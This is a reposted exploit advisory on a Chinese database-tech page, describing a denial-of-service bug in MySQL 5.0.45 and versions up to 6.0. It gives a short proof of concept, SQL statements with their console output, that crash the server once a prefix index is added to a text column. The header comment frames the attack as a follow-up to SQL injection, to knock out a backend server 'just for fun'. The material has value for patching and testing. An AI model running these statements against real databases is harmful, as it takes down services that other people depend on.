mysql 5.0.45 (修改)拒绝服务漏洞

2023年 4月 20日 34.9k 0

mysql 5.0.45 (修改)拒绝服务漏洞 /* * MySQL =6.0 possibly affected * Kristian Erik Hermansen * Credit: Joe Gallo * You must have Alter permissions to exploit this bug! * Scenario: You found SQL injection, but you want to punch ba

mysql 5.0.45 (修改)拒绝服务漏洞 /* * MySQL <=6.0 possibly affected * Kristian Erik Hermansen * Credit: Joe Gallo * You must have Alter permissions to exploit this bug! * Scenario: You found SQL injection, but you want to punch backend server * in the nuts just for fun. Start with the Alter TABLE statement on * a table and field you know to exist. The first two SQL statements are * simply to demostrate reproducibility... */ <snip> mysql> Create TABLE `test` ( `id` int(10) unsigned NOT NULL AUTO_INCREMENT PRIMARY KEY, `foo` text NOT NULL ) ENGINE=InnoDB DEFAULT CHARSET=latin1; Query OK, 0 rows affected mysql> Select * FROM test Where CONTAINS(foo, ''bar''); Empty set mysql> Alter TABLE test ADD INDEX (foo(100)); Query OK, 0 rows affected Records: 0 Duplicates: 0 Warnings: 0 mysql> Select * FROM test Where CONTAINS(foo, ''bar''); ERROR 2013 : Lost connection to MySQL server during query </snip>

相关文章

Oracle如何使用授予和撤销权限的语法和示例
Awesome Project: 探索 MatrixOrigin 云原生分布式数据库
下载丨66页PDF,云和恩墨技术通讯(2024年7月刊)
社区版oceanbase安装
Oracle 导出CSV工具-sqluldr2
ETL数据集成丨快速将MySQL数据迁移至Doris数据库

发布评论